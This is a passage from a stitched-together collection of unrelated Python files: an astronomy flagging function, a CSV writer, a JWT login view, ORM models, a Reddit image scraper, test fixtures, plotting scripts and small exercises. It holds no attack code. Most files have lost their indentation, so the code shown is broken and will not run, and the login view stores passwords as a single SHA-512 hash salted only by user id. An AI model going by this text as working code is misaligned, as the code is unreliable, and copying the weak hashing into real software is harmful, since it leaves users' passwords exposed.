    numpy.ndarray of flags ('Ha', 'Hb' or 'nan'), all entries dtype = str
"""
    # Cast line-quality columns to nullable integers for the conditionals below
    lines_df['Halpha_LQ'] = lines_df['Halpha_LQ'].astype('Int64')
    lines_df['Hbeta_LQ'] = lines_df['Hbeta_LQ'].astype('Int64')
# Conditions for each calc
Ha_cond = (lines_df['Halpha_LQ']>0) & (lines_df['Halpha_LQ']<2)
Hb_cond = (lines_df['Hbeta_LQ']>0) & (lines_df['Hbeta_LQ']<2) & (lines_df['Halpha_LQ']!=1)
# Make flags
SFR_flags = np.full(len(lines_df), str(np.nan))
SFR_flags[Ha_cond] = 'Ha'
SFR_flags[Hb_cond] = 'Hb'
return SFR_flags
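# Minimal sketch of the switchboard logic (illustrative only, never called here): rows with
# Halpha_LQ == 1 get flagged 'Ha', rows with Hbeta_LQ == 1 but no usable H-alpha line get
# flagged 'Hb', everything else keeps the 'nan' flag.
def _demo_SFR_switchboard():
    demo_df = pd.DataFrame({'Halpha_LQ': [1, 0, 2], 'Hbeta_LQ': [0, 1, 0]})
    return SFR_switchboard(demo_df)  # array(['Ha', 'Hb', 'nan'], dtype='<U3')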
|
|
src/dataset/writer/csv_writer.py
|
KlemenGrebovsek/Cargo-stowage-optimization
|
|
|
import csv
import os
from src.dataset.writer.ds_writer import DatasetWriterInterface
from src.model.dataset import Dataset
class CSVDatasetWriter(DatasetWriterInterface):
def write(self, dir_path: str, file_name: str, dataset: Dataset):
"""Writes dataset to csv file.
Args:
file_name: Dataset file name without file extension.
dataset: Dataset to write.
dir_path: Path to dir.
Throws:
ValueError
        Returns: None. The dataset is written to <dir_path>/<file_name>.csv.
"""
if dir_path is None or len(dir_path) < 1 or not os.path.isdir(dir_path):
raise ValueError('Invalid dir path')
if file_name is None or len(file_name) < 1:
raise ValueError('Invalid file name')
full_path = os.path.join(dir_path, file_name+'.csv')
if os.path.isfile(full_path):
raise ValueError('File already exists')
with open(full_path, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow([dataset.title])
writer.writerow([dataset.total_packages,
dataset.total_stations,
dataset.width,
dataset.height])
for package in dataset.packages:
writer.writerow([package.id, package.station_in, package.station_out, package.weight])
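# Hedged usage sketch (illustrative only, never called here): SimpleNamespace stand-ins
# mimic the Dataset/package attributes the writer reads; the real Dataset model lives in
# src.model.dataset, and the '/tmp' directory is an assumption for the demo.
def _demo_csv_writer(tmp_dir='/tmp'):
    from types import SimpleNamespace
    dataset = SimpleNamespace(
        title='demo', total_packages=1, total_stations=2, width=3, height=4,
        packages=[SimpleNamespace(id=1, station_in=1, station_out=2, weight=10)])
    CSVDatasetWriter().write(tmp_dir, 'demo_dataset', dataset)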
|
|
src/closure_table/auth/views.py
|
vyacheslav-bezborodov/dvhb
|
|
|
import hashlib
from datetime import datetime, timedelta
import jwt
from aiohttp import web
from closure_table.auth.db.queries import user_get
from closure_table.settings import JWT_ALGORITHM, JWT_EXP_DELTA_SECONDS, JWT_SECRET
async def user_login_view(request):
params = await request.json()
email = params.get('email')
password = params.get('password')
async with request.app['db'].acquire() as conn:
user = await user_get(conn, email)
m = hashlib.sha512()
m.update(str(password).encode())
m.update(str(user.get('id')).encode())
if email != user.get('email') or m.hexdigest() != user.get('password'):
return web.json_response(status=400, data={
'error': 'Incorrect email or password'
})
expired = datetime.utcnow() + timedelta(seconds=JWT_EXP_DELTA_SECONDS)
payload = {
'email': user['email'],
'exp': expired
}
jwt_token = jwt.encode(payload, JWT_SECRET, JWT_ALGORITHM)
return web.json_response({
'token': jwt_token.decode(),
'expired': expired.strftime('%c'),
})
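# Hedged sketch of the password-hash convention checked above (hypothetical helper, not part
# of the original codebase): the stored hash is sha512 over the plaintext password followed
# by the user's id.
def _hash_password_for_user(password, user_id):
    m = hashlib.sha512()
    m.update(str(password).encode())
    m.update(str(user_id).encode())
    return m.hexdigest()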
|
|
|
|
|
|
from model.base import BaseModel
from schema.group import GroupOut
from sqlalchemy import (
Column,
String
)
from sqlalchemy.orm import relationship
class Group(BaseModel):
__tablename__ = 'GROUP'
name = Column('NAME', String, nullable=False, unique=True)
group_user = relationship("UserGroup", back_populates="group")
group_permission = relationship("Permission", back_populates="group")
group_permission_part = relationship("PermissionPart", back_populates="group")
def ToGroupOut(self) -> GroupOut:
return GroupOut(
id = self.id,
name = self.name,
created_at = self.created_at,
updated_at = self.updated_at
)
|
|
|
|
|
|
"""
This module is similar to a LLVM SSA.
https://releases.llvm.org/2.6/docs/LangRef.html#i_load
"""
|
|
|
|
|
|
w_width = 500
w_height = 500
colors = { 'grid': (255,255,255),
'background': (0,0,0),
'x': (255,0,0),
'o': (0,255,0),
'cross': (0,0,255)}
|
|
|
WasinUddy/Reddit-Image-Scraper
|
|
|
import pandas as pd
import numpy as np
import praw
import cv2
import requests
from tkinter import *
from tkinter.ttk import *
from PIL import Image as PILIMAGE
import os
from pathlib import Path
class Reddit:
def __init__(self, client_ID, client_secret):
self.reddit = praw.Reddit(
client_id=client_ID,
client_secret=client_secret,
user_agent='cor',
username=None,
password=<PASSWORD>
)
self.index = 0
    def getSubreddit(self, csvFile):
        self.subreddits = []
        with open(csvFile, "r") as f_final:
            for line in f_final:
                sub = line.strip()
                self.subreddits.append(sub)
def run(self, N, path):
print(path)
self.downloadImage(N, path)
def downloadImage(self, N, path):
ignoreImages = [cv2.imread("resources/ignoreImages/imageNF.png"), cv2.imread("resources/ignoreImages/DeletedIMG.png")]
for subreddit in self.subreddits:
if not os.path.exists(f"{path}/{subreddit}"):
os.makedirs(f"{path}/{subreddit}")
subreddit = self.reddit.subreddit(subreddit)
i = 0
for submission in subreddit.new(limit=int(N)):
#
#
# self.progress['value'] += self.progress['value']
try:
if "jpg" in submission.url.lower() or "png" in submission.url.lower():
resp = requests.get(submission.url.lower(), stream=True).raw
image = np.asarray(bytearray(resp.read()), dtype='uint8')
image = cv2.imdecode(image, cv2.IMREAD_COLOR)
# Compare with ignore Image
ignoreERROR = False
compare_image = cv2.resize(image, (224, 224))
for ignore in ignoreImages:
diff = cv2.subtract(ignore, compare_image)
b_ch, g_ch ,r_ch = cv2.split(diff)
tdiff = cv2.countNonZero(b_ch) + cv2.countNonZero(g_ch) + cv2.countNonZero(r_ch)
# Image has to be ignore
if tdiff == 0:
ignoreERROR = True
if not ignoreERROR:
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
img = PILIMAGE.fromarray(image)
img.save(f"{path}/{subreddit}/{i}.png")
print(f"saved --> {path}/{subreddit}/{i}.png")
i += 1
            except Exception:
                # Skip posts whose images cannot be downloaded or decoded
                pass
|
|
|
|
|
|
"""Tests for Winixdevice component."""
from unittest.mock import AsyncMock, MagicMock, Mock
import pytest
from custom_components.winix.device_wrapper import WinixDeviceWrapper
from custom_components.winix.driver import WinixDriver
@pytest.fixture
def mock_device_wrapper() -> WinixDeviceWrapper:
"""Return a mocked WinixDeviceWrapper instance."""
device_wrapper = MagicMock()
device_wrapper.info.mac = "f190d35456d0"
device_wrapper.info.alias = "Purifier1"
device_wrapper.async_plasmawave_off = AsyncMock()
device_wrapper.async_plasmawave_on = AsyncMock()
device_wrapper.async_set_preset_mode = AsyncMock()
device_wrapper.async_set_speed = AsyncMock()
device_wrapper.async_turn_on = AsyncMock()
yield device_wrapper
@pytest.fixture
def mock_driver() -> WinixDriver:
"""Return a mocked WinixDriver instance."""
client = Mock()
device_id = "device_1"
yield WinixDriver(device_id, client)
@pytest.fixture
def mock_driver_with_payload(request) -> WinixDriver:
"""Return a mocked WinixDriver instance."""
json_value = {"body": {"data": [{"attributes": request.param}]}}
response = Mock()
response.json = AsyncMock(return_value=json_value)
client = Mock() # aiohttp.ClientSession
client.get = AsyncMock(return_value=response)
device_id = "device_1"
yield WinixDriver(device_id, client)
|
|
dev/scripts/docker_build.py
|
|
|
|
from flowserv.controller.worker.docker import docker_build
image, logs = docker_build(name='test_build', requirements=['histore'])
print('\n'.join(logs))
print()
print(image)
|
|
GEOS_Util/coupled_diagnostics/verification/levitus/s_profile.py
|
|
|
|
#!/bin/env python
import os
import scipy as sp
import matplotlib.pyplot as pl
from matplotlib import ticker
# Read variable
execfile('ctl.py')
iind=300
s=ctl.fromfile('salt',iind=iind).ave(0)
s.name='S at 60W'
###################### Do plots #######################################################
clevs=sp.arange(33.,36.1,0.2)
pl.figure(1)
pl.clf()
s.copts={'func': pl.contourf,\
'levels' : clevs,\
}
s.plot2d(); s.copts.clear()
s.copts={'levels' : clevs[0::2],\
'colors' : 'black',\
'func': pl.contour
}
s.plot2d()
ax=pl.gca(); ax.set_ylim(0.,3000.); ax.invert_yaxis(); ax.set_ylabel('depth, m')
ax.xaxis.set_major_locator(ticker.MultipleLocator(30))
pl.grid(); pl.show()
pl.savefig('pics/s_profile/s_60W.png')
|
|
|
CosminNechifor/Assembly-to-VHDL-memory
|
|
|
from tkinter import *
from src.tools import parser
from src.bll import logic
global text
global riscInstructions
PATH_TO_JSON = './tools/instructions.json'
PATH_TO_MEMORY_S = './bll/memoryStart.txt'
PATH_TO_MEMORY_E = './bll/memoryEnd.txt'
def writeMemory():
# assemblyCode = text.get("1.0",END).split('\n')
# assemblyCode.pop()
assemblyCode = ['XOR r1, r2, r3', 'ADDI r3, r2, 100', 'JMP r4']
size = len(assemblyCode)
binary = logic.convertAssemblyToBinary(assemblyCode, riscInstructions)
print(binary)
logic.binaryToVHDLMemory(binary, pathS=PATH_TO_MEMORY_S, pathE=PATH_TO_MEMORY_E)
def createWindow():
global text
global riscInstructions
quit = Button(text="QUIT", fg="red",
command=root.destroy)
quit.pack(side="bottom")
assemble = Button(text="Create memory", fg="blue", command=writeMemory)
assemble.pack(side="bottom")
scroolBar = Scrollbar(root)
text = Text(root, height=50, width=50)
scroolBar.pack(side=RIGHT, fill=Y)
text.pack(side=LEFT, fill=Y)
scroolBar.config(command=text.yview)
text.config(yscrollcommand=scroolBar.set)
riscInstructions = parser.getInstructions(PATH_TO_JSON)
if __name__ == '__main__':
root = Tk()
createWindow()
root.mainloop()
|
|
|
maximilianschaller/genforce
|
|
|
# python3.7
"""Collects all runners."""
from .stylegan_runner_fourier_regularized import FourierRegularizedStyleGANRunner
__all__ = ['FourierRegularizedStyleGANRunner']
|
|
|
MHDBST/Movie_Recommender_System
|
|
|
import random
import math
file='ratings.csv'
train_list=[]
test_list=[]
temp_list=[]
preID=-1
with open(file) as votes:
for i,vote in enumerate(votes):
if i==0: continue
tokens=vote.split(',')
userID=int(tokens[0])
movieID=int(tokens[1])
rate=float(tokens[2])
if(userID==preID):
temp_list.append(vote)
else:
preID=userID
size=int(math.floor(len(temp_list)/10))
test=random.sample(range(0, len(temp_list)), size)
for i,item in enumerate(temp_list):
if i in test:
test_list.append(item)
else:
train_list.append(item)
#print len(train_list),len(test_list)
temp_list=[]
temp_list.append(vote)
# The loop above never splits the last user's ratings, so handle the leftover here
if temp_list:
    test = random.sample(range(0, len(temp_list)), int(math.floor(len(temp_list) / 10)))
    test_list.extend(item for i, item in enumerate(temp_list) if i in test)
    train_list.extend(item for i, item in enumerate(temp_list) if i not in test)
with open('train.csv', 'w') as output:
    for item in train_list:
        output.write(item)
with open('test.csv', 'w') as output:
    for item in test_list:
        output.write(item)
|
|
|
|
|
|
from botsdk.util.BotPlugin import BotPlugin
class plugin(BotPlugin):
def onLoad(self):
self.name = "chuo"
self.addType("NudgeEvent", self.nudge)
self.addBotType("Mirai")
self.canDetach = True
async def nudge(self, request):
if str(request["target"]) == request.getBot().getQq():
await request.getBot().sendNudge(target=request["fromId"],
subject=request["subject"]["id"],
kind=request["subject"]["kind"])
def handle():
return plugin()
|
|
examples/ignore-timeout.py
|
|
|
|
import fscc
if __name__ == '__main__':
p = fscc.Port(0)
status = p.ignore_timeout
p.ignore_timeout = True
p.ignore_timeout = False
|
|
pythontutor-ru/07_lists/08_num_distinct.py
|
|
|
|
"""
http://pythontutor.ru/lessons/lists/problems/num_distinct/
Given a list sorted in non-decreasing order, determine how many distinct elements it contains.
"""
lst = [int(i) for i in input().split()]
counter = 1
for i in range(len(lst) - 1):
if lst[i] != lst[i + 1]:
counter += 1
print(counter)
|
|